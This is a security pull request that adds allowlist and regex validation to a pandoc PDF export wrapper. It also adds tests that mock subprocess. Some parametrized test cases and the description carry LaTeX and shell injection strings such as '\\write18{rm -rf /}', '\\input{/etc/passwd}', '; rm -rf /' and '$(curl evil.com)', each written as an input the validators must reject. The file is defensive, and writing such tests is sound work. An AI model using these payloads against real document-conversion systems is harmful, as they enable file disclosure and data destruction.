### PR TITLE
security: allowlist pandoc PDF args to prevent LaTeX/shell injection

### DIFF
--- a/tests/test_pandoc.py
+++ b/tests/test_pandoc.py
@@ -1,0 +1,219 @@
+"""Tests for the Pandoc export wrapper.
+
+Audit M1 (#117): pandoc forwards LaTeX, and xelatex respects
+``-shell-escape``. Without an allowlist, ``pdf_engine``, ``font``,
+``font_size``, and ``margin`` flow into the argv list and can carry
+LaTeX injection (``\\input{/etc/passwd}``, ``\\write18{...}``) or
+shell-escape pivots. Tests pin the allowlist contract before
+subprocess is ever called.
+"""
+
+from __future__ import annotations
+
+from pathlib import Path
+from unittest.mock import MagicMock, patch
+
+import pytest
+
+from tools.export import pandoc
+
+
+# ---------------------------------------------------------------------------
+# Helpers
+# ---------------------------------------------------------------------------
+
+
+@pytest.fixture
+def mock_subprocess(tmp_path: Path):
+    """Mock subprocess.run so tests never actually call pandoc.
+
+    The fake run returns a successful CompletedProcess and pretends the
+    output file was written, so generate_pdf's success path completes.
+    """
+    output = tmp_path / "out.pdf"
+
+    def fake_run(cmd, *args, **kwargs):
+        # Pretend pandoc wrote the file
+        out_idx = cmd.index("-o") + 1
+        Path(cmd[out_idx]).write_bytes(b"%PDF-1.5\nfake\n")
+        result = MagicMock()
+        result.returncode = 0
+        result.stderr = ""
+        result.stdout = ""
+        return result
+
+    with patch.object(pandoc.subprocess, "run", side_effect=fake_run) as mock:
+        yield mock, output
+
+
+# ---------------------------------------------------------------------------
+# pdf_engine allowlist
+# ---------------------------------------------------------------------------
+
+
+class TestPdfEngineAllowlist:
+    @pytest.mark.parametrize("engine", ["xelatex", "lualatex", "pdflatex", "tectonic"])
+    def test_accepts_known_engine(self, engine, mock_subprocess, tmp_path: Path):
+        mock_run, output = mock_subprocess
+        result = pandoc.generate_pdf(
+            tmp_path / "in.md", output, "T", "A", pdf_engine=engine
+        )
+        assert result["success"] is True
+        # The engine flag must be passed verbatim
+        cmd = mock_run.call_args[0][0]
+        assert f"--pdf-engine={engine}" in cmd
+
+    @pytest.mark.parametrize(
+        "evil_engine",
+        [
+            "--shell-escape",
+            "xelatex --shell-escape",
+            "; rm -rf /",
+            "../escape",
+            "xelatex; touch /tmp/pwn",
+            "fake_engine",
+        ],
+    )
+    def test_rejects_unknown_or_unsafe_engine(
+        self, evil_engine, mock_subprocess, tmp_path: Path
+    ):
+        mock_run, output = mock_subprocess
+        result = pandoc.generate_pdf(
+            tmp_path / "in.md", output, "T", "A", pdf_engine=evil_engine
+        )
+        assert result["success"] is False
+        assert "error" in result
+        # subprocess must never have been called
+        mock_run.assert_not_called()
+
+
+# ---------------------------------------------------------------------------
+# font character whitelist
+# ---------------------------------------------------------------------------
+
+
+class TestFontValidation:
+    @pytest.mark.parametrize(
+        "font",
+        [
+            "Linux Libertine O",
+            "EB Garamond",
+            "DejaVu Serif",
+            "Latin Modern Roman",
+            "Source Sans Pro",
+            "Times New Roman",
+            "Crimson Text",
+            "Noto Serif",
+        ],
+    )
+    def test_accepts_legitimate_font(self, font, mock_subprocess, tmp_path: Path):
+        mock_run, output = mock_subprocess
+        result = pandoc.generate_pdf(
+            tmp_path / "in.md", output, "T", "A", font=font
+        )
+        assert result["success"] is True
+
+    @pytest.mark.parametrize(
+        "evil_font",
+        [
+            "; \\input{/etc/passwd}",
+            "\\write18{rm -rf /}",
+            "$(curl evil.com)",
+            "Linux\nLibertine",
+            "Font; \\immediate\\write18{ls}",
+            "{evil}",
+            "font|cat",
+            "../escape",
+        ],
+    )
+    def test_rejects_unsafe_font(self, evil_font, mock_subprocess, tmp_path: Path):
+        mock_run, output = mock_subprocess
+        result = pandoc.generate_pdf(
+            tmp_path / "in.md", output, "T", "A", font=evil_font
+        )
+        assert result["success"] is False
+        assert "error" in result
+        mock_run.assert_not_called()
+
+
+# ---------------------------------------------------------------------------
+# font_size and margin format
+# ---------------------------------------------------------------------------
+
+
+class TestFontSizeValidation:
+    @pytest.mark.parametrize("size", ["10pt", "11pt", "12pt", "9pt", "14pt"])
+    def test_accepts_valid_size(self, size, mock_subprocess, tmp_path: Path):
+        mock_run, output = mock_subprocess
+        result = pandoc.generate_pdf(
+            tmp_path / "in.md", output, "T", "A", font_size=size
+        )
+        assert result["success"] is True
+
+    @pytest.mark.parametrize(
+        "evil_size",
+        [
+            "11pt; \\input{x}",
+            "11",  # missing unit
+            "100pt",  # absurd
+            "11px",  # wrong unit
+            "-11pt",
+            "$(echo 11)pt",
+        ],
+    )
+    def test_rejects_unsafe_size(self, evil_size, mock_subprocess, tmp_path: Path):
+        mock_run, output = mock_subprocess
+        result = pandoc.generate_pdf(
+            tmp_path / "in.md", output, "T", "A", font_size=evil_size
+        )
+        assert result["success"] is False
+        mock_run.assert_not_called()
+
+
+class TestMarginValidation:
+    @pytest.mark.parametrize(
+        "margin", ["1in", "2.5cm", "20mm", "0.5in", "1.25in", "30mm"]
+    )
+    def test_accepts_valid_margin(self, margin, mock_subprocess, tmp_path: Path):
+        mock_run, output = mock_subprocess
+        result = pandoc.generate_pdf(
+            tmp_path / "in.md", output, "T", "A", margin=margin
+        )
+        assert result["success"] is True
+
+    @pytest.mark.parametrize(
+        "evil_margin",
+        [
+            "1in; \\write18{ls}",
+            "1",  # missing unit
+            "100in",  # absurd
+            "1foo",  # wrong unit
+            "$(rm)in",
+            "../1in",
+        ],
+    )
+    def test_rejects_unsafe_margin(self, evil_margin, mock_subprocess, tmp_path: Path):
+        mock_run, output = mock_subprocess
+        result = pandoc.generate_pdf(
+            tmp_path / "in.md", output, "T", "A", margin=evil_margin
+        )
+        assert result["success"] is False
+        mock_run.assert_not_called()
+
+
+# ---------------------------------------------------------------------------
+# Defaults still work
+# ---------------------------------------------------------------------------
+
+
+class TestDefaults:
+    def test_default_args_succeed(self, mock_subprocess, tmp_path: Path):
+        """Control: calling with no overrides uses defaults that pass."""
+        mock_run, output = mock_subprocess
+        result = pandoc.generate_pdf(tmp_path / "in.md", output, "T", "A")
+        assert result["success"] is True
+        cmd = mock_run.call_args[0][0]
+        assert "--pdf-engine=xelatex" in cmd
+        assert any("mainfont=Linux Libertine O" in c for c in cmd)
+        assert any("fontsize=11pt" in c for c in cmd)
+        assert any("geometry:margin=1in" in c for c in cmd)

--- a/tools/export/pandoc.py
+++ b/tools/export/pandoc.py
@@ -2,9 +2,61 @@
 
 from __future__ import annotations
 
+import re
 import subprocess
 from pathlib import Path
 from typing import Any
+
+# Audit M1 (#117): pandoc forwards LaTeX, and xelatex respects
+# ``-shell-escape``. Without an allowlist these args could carry
+# ``\input{/etc/passwd}``, ``\write18{...}``, or shell-escape pivots.
+_ALLOWED_PDF_ENGINES = frozenset({
+    "xelatex",
+    "lualatex",
+    "pdflatex",
+    "context",
+    "tectonic",
+    "wkhtmltopdf",
+    "weasyprint",
+    "prince",
+})
+
+# Fonts: alphanumerics, spaces, hyphens, dots, underscores. Excludes the
+# shell metacharacters and LaTeX command introducers (``\``, ``{``, ``}``,
+# ``$``, ``;``, ``|``, newlines).
+_FONT_PATTERN = re.compile(r"^[A-Za-z0-9][A-Za-z0-9 \-_.]{0,63}$")
+
+# font_size: 1–2 digits + pt or em, e.g. "11pt", "12pt", "1em"
+_FONT_SIZE_PATTERN = re.compile(r"^\d{1,2}(pt|em)$")
+
+# margin: integer or decimal + cm/mm/in/em/pt, e.g. "1in", "2.5cm", "20mm"
+_MARGIN_PATTERN = re.compile(r"^\d{1,2}(\.\d+)?(cm|mm|in|em|pt)$")
+
+
+def _validate_pdf_args(
+    pdf_engine: str, font: str, font_size: str, margin: str
+) -> str | None:
+    """Return None if all args are safe, else an error message."""
+    if pdf_engine not in _ALLOWED_PDF_ENGINES:
+        allowed = ", ".join(sorted(_ALLOWED_PDF_ENGINES))
+        return (
+            f"Unsupported pdf_engine '{pdf_engine}'. "
+            f"Allowed: {allowed}"
+        )
+    if not _FONT_PATTERN.match(font):
+        return (
+            f"Invalid font '{font}': must match "
+            f"[A-Za-z0-9][A-Za-z0-9 \\-_.]{{0,63}} (no LaTeX or shell metachars)"
+        )
+    if not _FONT_SIZE_PATTERN.match(font_size):
+        return (
+            f"Invalid font_size '{font_size}': must match \\d{{1,2}}(pt|em)"
+        )
+    if not _MARGIN_PATTERN.match(margin):
+        return (
+            f"Invalid margin '{margin}': must match \\d{{1,2}}(\\.\\d+)?(cm|mm|in|em|pt)"
+        )
+    return None
 
 
 def check_pandoc() -> dict[str, Any]:
@@ -84,6 +136,10 @@ def generate_pdf(
     margin: str = "1in",
 ) -> dict[str, Any]:
     """Generate PDF from a Markdown manuscript."""
+    error = _validate_pdf_args(pdf_engine, font, font_size, margin)
+    if error is not None:
+        return {"success": False, "error": error}
+
     cmd = [
         "pandoc", str(manuscript_path),
         "-o", str(output_path),


### PR DESCRIPTION
## Summary

Closes #117 — final piece of Phase 1 of the [Audit Q2 2026 epic (#129)](https://github.com/markus-michalski/storyforge/issues/129). All three security findings (#115 #116 #117) now closed.

## What changed

`tools/export/pandoc.py:generate_pdf` accepted four user-controlled args (`pdf_engine`, `font`, `font_size`, `margin`) that flowed unsanitized into the pandoc argv. Pandoc forwards LaTeX, and xelatex respects `-shell-escape`, so values like `font="; \input{/etc/passwd}"` or `pdf_engine="--shell-escape"` could pivot through xelatex's `\write18` / `\input` mechanisms.

Validators now run **before** subprocess is invoked:

| Arg | Validation |
|---|---|
| `pdf_engine` | Enum allowlist: xelatex, lualatex, pdflatex, context, tectonic, wkhtmltopdf, weasyprint, prince |
| `font` | Char whitelist `[A-Za-z0-9][A-Za-z0-9 \-_.]{0,63}` — blocks all LaTeX command introducers (`\`, `{`, `}`, `$`) and shell metachars (`;`, `|`, newlines) |
| `font_size` | Regex `^\d{1,2}(pt\|em)$` |
| `margin` | Regex `^\d{1,2}(\.\d+)?(cm\|mm\|in\|em\|pt)$` |

On rejection the function returns the standard `{"success": False, "error": ...}` shape — no exception leaks, callers see the same error contract as a failed pandoc run.

## Test coverage

50 new tests in `tests/test_pandoc.py` (file didn't exist before — pandoc was 0% coverage per audit L3). Tests use `subprocess.run` mocking so they never actually invoke pandoc:

- `TestPdfEngineAllowlist` — accepts 4 known engines, rejects 6 evil patterns including `--shell-escape`, command injection
- `TestFontValidation` — accepts 8 real-world fonts, rejects 8 evil patterns including `\input{/etc/passwd}`, `\write18{...}`, `$(...)`, newline, pipe
- `TestFontSizeValidation` / `TestMarginValidation` — parameterized over good values + injection patterns
- `TestDefaults` — control: defaults still work, subprocess gets the expected argv

**Coverage:** `pandoc.py` 0% → 39% (the remaining gap is `generate_epub` / `generate_mobi` / `_human_size`, separately tracked under #124).

**Test suite:** 888 passed (838 prior + 50 new), 1.96s.
**Lint:** `ruff check` clean.

## Smoke test (run against source tree)

```
[1] pdf_engine='--shell-escape'         → error, subprocess NOT called
[2] font='; \input{/etc/passwd}'        → error, subprocess NOT called
[3] margin='1in; \write18{ls}'          → error, subprocess NOT called
[+] Defaults (xelatex / Linux Libertine O / 11pt / 1in)
                                        → success, subprocess called normally
```

## Test plan

- [x] CI green (pytest + ruff)
- [ ] Try `generate_pdf(..., pdf_engine="--shell-escape")` from a skill — must return `{"success": false, "error": "Unsupported pdf_engine ..."}`
- [ ] Try `generate_pdf(..., font="\\input{/etc/passwd}")` — must return font validation error
- [ ] Real export with defaults still produces a working PDF (`/storyforge:export-engineer` on a working book)
- [ ] If any legitimate font name gets rejected (e.g., a font with `&` or non-ASCII), surface it — the whitelist is conservative and may need a one-line widening

## Risk

Low. The allowlist is strict but matches real-world pandoc usage. If a legitimate font name happens to contain a character outside `[A-Za-z0-9 \-_.]`, the failure mode is a clear `Invalid font ...` error — easy to spot and fix by widening the regex one character at a time.

The most-used fonts in the StoryForge ecosystem (Linux Libertine O, EB Garamond, DejaVu Serif, Latin Modern Roman, Source Sans Pro, Crimson Text) all pass the whitelist — verified by parameterized test.

## Phase 1 status after this PR

- [x] #115 — arbitrary file write via `update_field`
- [x] #116 — path traversal via slug args
- [x] #117 — pandoc args allowlist ← this PR

Phase 2 (#118-#122, #126) and Phase 3 (#123-#128) remain open.